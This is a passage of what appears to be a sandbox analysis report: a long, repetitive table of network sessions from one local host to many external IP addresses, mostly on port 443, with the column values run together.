                                                        15941192.168.2.1448066203.27.139.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15942192.168.2.1435336138.164.86.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15943192.168.2.1459102166.39.148.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15944192.168.2.1441540139.235.249.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15945192.168.2.145192836.137.238.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15946192.168.2.145788839.38.220.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15947192.168.2.1438736119.158.130.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15948192.168.2.1454284118.82.50.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15949192.168.2.1458184102.95.169.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15950192.168.2.1455366122.135.127.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15951192.168.2.1447696205.65.231.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15952192.168.2.145468034.17.213.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15953192.168.2.146077818.226.122.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15954192.168.2.1450286139.141.128.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15955192.168.2.144142895.202.103.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15956192.168.2.143626062.249.120.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15957192.168.2.1448998197.76.51.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15958192.168.2.1440628158.231.7.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15959192.168.2.1443414223.44.248.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15960192.168.2.1456466195.118.63.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15961192.168.2.1439592152.47.153.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15962192.168.2.145309487.39.57.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15963192.168.2.14413169.108.224.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15964192.168.2.1454622136.214.51.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15965192.168.2.1456854177.104.54.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15966192.168.2.1442432187.91.34.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15967192.168.2.144374627.145.104.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15968192.168.2.1453342187.36.21.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15969192.168.2.1435324150.77.53.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15970192.168.2.145595899.244.243.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15971192.168.2.1457540109.122.231.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15972192.168.2.144908023.90.31.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15973192.168.2.143843686.218.161.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15974192.168.2.1452992216.217.171.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15975192.168.2.1434156218.90.203.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15976192.168.2.1450528168.16.168.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15977192.168.2.144779273.59.242.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15978192.168.2.1445556109.159.240.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15979192.168.2.145673448.216.90.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15980192.168.2.1456264133.225.82.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15981192.168.2.143715032.230.177.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15982192.168.2.1458688204.239.105.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15983192.168.2.1447096114.194.108.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15984192.168.2.1438944167.9.68.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15985192.168.2.143780664.227.222.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15986192.168.2.145218672.111.233.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15987192.168.2.1448124207.103.112.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15988192.168.2.145602819.48.204.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15989192.168.2.1458542183.253.79.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15990192.168.2.1443646132.54.217.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15991192.168.2.1459756114.105.1.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15992192.168.2.1453434101.190.117.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15993192.168.2.1436118160.95.164.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15994192.168.2.1456550147.239.125.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15995192.168.2.143868436.12.152.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15996192.168.2.1440356125.226.37.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15997192.168.2.1446554108.43.231.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15998192.168.2.1445172196.128.24.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15999192.168.2.144266061.176.104.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16000192.168.2.1454324174.194.140.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16001192.168.2.145460668.218.89.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16002192.168.2.145253479.193.119.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16003192.168.2.145456425.161.245.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16004192.168.2.1446968203.212.135.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16005192.168.2.1451108130.251.74.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16006192.168.2.144183484.244.62.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16007192.168.2.1436498191.40.193.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16008192.168.2.1446690147.206.206.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16009192.168.2.1458594114.149.122.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16010192.168.2.144559461.139.203.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16011192.168.2.1439276104.105.42.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16012192.168.2.1438766220.216.105.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16013192.168.2.145392631.92.135.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16014192.168.2.14490989.22.29.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16015192.168.2.1451874152.130.56.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16016192.168.2.1443302167.201.137.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16017192.168.2.1448000125.128.5.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16018192.168.2.1441918129.19.124.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16019192.168.2.1454674209.20.233.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16020192.168.2.1456758146.61.57.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16021192.168.2.1443742130.76.95.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16022192.168.2.1458782199.48.210.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16023192.168.2.145279474.12.157.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16024192.168.2.1436820210.63.236.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16025192.168.2.145165665.12.116.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16026192.168.2.144999663.67.186.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16027192.168.2.1457122120.85.48.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16028192.168.2.144019223.9.188.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16029192.168.2.1448380164.2.2.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16030192.168.2.1434404204.177.137.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16031192.168.2.1457562130.164.238.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16032192.168.2.145522669.130.139.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16033192.168.2.1451088165.147.72.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16034192.168.2.144494252.83.175.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16035192.168.2.144080093.61.194.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16036192.168.2.1443940125.66.110.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16037192.168.2.143378218.250.159.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16038192.168.2.1457818135.153.255.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16039192.168.2.144086480.224.242.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16040192.168.2.145383858.40.97.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16041192.168.2.144607269.143.195.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16042192.168.2.1439060148.98.27.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16043192.168.2.143945868.130.15.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16044192.168.2.143776685.38.223.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16045192.168.2.144224482.134.251.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16046192.168.2.143305812.41.112.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16047192.168.2.144343441.106.26.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16048192.168.2.145544695.167.124.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16049192.168.2.1444590114.77.136.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16050192.168.2.144135491.122.206.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16051192.168.2.14590348.214.170.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16052192.168.2.1455310223.196.62.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16053192.168.2.145225059.253.166.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16054192.168.2.1435578173.125.68.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16055192.168.2.144282844.235.171.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16056192.168.2.1437038191.72.56.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16057192.168.2.1447736163.106.101.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16058192.168.2.145814272.89.147.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16059192.168.2.14382205.187.60.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16060192.168.2.1440534101.203.111.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16061192.168.2.1458342164.5.117.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16062192.168.2.1443780104.28.93.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16063192.168.2.1447264163.5.184.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16064192.168.2.1451594142.63.41.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16065192.168.2.1443716141.117.210.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16066192.168.2.1435500155.111.234.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16067192.168.2.1442814150.137.193.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16068192.168.2.143456684.128.161.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16069192.168.2.1459136221.36.229.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16070192.168.2.145464447.140.29.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16071192.168.2.1449262189.50.220.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16072192.168.2.1458422131.165.208.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16073192.168.2.1456818116.107.113.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16074192.168.2.1432806126.130.26.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16075192.168.2.1434986221.241.112.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16076192.168.2.143500858.44.202.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16077192.168.2.1449106110.253.133.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16078192.168.2.1444332104.173.177.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16079192.168.2.145474091.126.75.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16080192.168.2.144955448.200.88.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16081192.168.2.1438718180.95.174.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16082192.168.2.1441442117.180.27.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16083192.168.2.145346283.66.169.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16084192.168.2.143425273.58.104.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16085192.168.2.1441750113.140.37.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16086192.168.2.1456826140.110.186.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16087192.168.2.144170297.99.35.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16088192.168.2.143367681.242.177.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16089192.168.2.1437226195.246.196.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16090192.168.2.1447872138.44.145.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16091192.168.2.1439494205.120.73.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16092192.168.2.1448014188.138.230.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16093192.168.2.144305080.15.2.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16094192.168.2.145309420.237.250.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16095192.168.2.1452512131.217.110.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16096192.168.2.145448269.76.123.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16097192.168.2.1453160116.219.36.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16098192.168.2.1452108193.126.227.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16099192.168.2.1434820157.246.19.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16100192.168.2.1454328103.60.163.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16101192.168.2.1436690112.9.6.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16102192.168.2.145766087.134.9.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16103192.168.2.1458846101.135.174.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16104192.168.2.1456056103.42.165.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16105192.168.2.1433464169.141.116.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16106192.168.2.1441154145.166.98.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16107192.168.2.144084836.123.36.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16108192.168.2.143345269.43.188.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16109192.168.2.143776414.154.40.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16110192.168.2.143357050.251.159.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16111192.168.2.1455468136.126.123.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16112192.168.2.144190495.120.99.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16113192.168.2.145601681.249.31.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16114192.168.2.1439874165.67.29.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16115192.168.2.146099638.184.239.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16116192.168.2.1446392108.148.186.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16117192.168.2.1460676122.85.229.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16118192.168.2.1437364173.96.79.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16119192.168.2.1434020112.18.142.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16120192.168.2.1436278133.201.252.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16121192.168.2.144783865.224.137.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16122192.168.2.144801680.11.75.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16123192.168.2.1452966104.188.154.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16124192.168.2.1443344199.54.159.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16125192.168.2.143521292.205.67.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16126192.168.2.145979695.184.127.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16127192.168.2.1435076219.194.103.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16128192.168.2.1445148156.53.16.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16129192.168.2.143918683.120.153.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16130192.168.2.1458008114.35.217.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16131192.168.2.143876414.57.186.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16132192.168.2.1438382200.43.176.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16133192.168.2.1460828115.68.201.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16134192.168.2.1457560128.99.206.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16135192.168.2.1438390207.104.53.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16136192.168.2.1436104174.237.248.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16137192.168.2.14444585.107.247.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16138192.168.2.144657037.167.212.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16139192.168.2.1449188163.78.202.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16140192.168.2.1439822125.10.102.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16141192.168.2.1437784149.14.11.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16142192.168.2.145115467.209.178.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16143192.168.2.143813479.109.157.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16144192.168.2.144825268.200.75.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16145192.168.2.1435892169.218.145.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16146192.168.2.1460266208.201.212.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16147192.168.2.1436554175.70.40.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16148192.168.2.143776677.191.172.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16149192.168.2.1457616191.42.205.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16150192.168.2.1451524173.177.242.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16151192.168.2.144576617.117.91.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16152192.168.2.1436496147.47.230.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16153192.168.2.1450838138.97.12.2428080
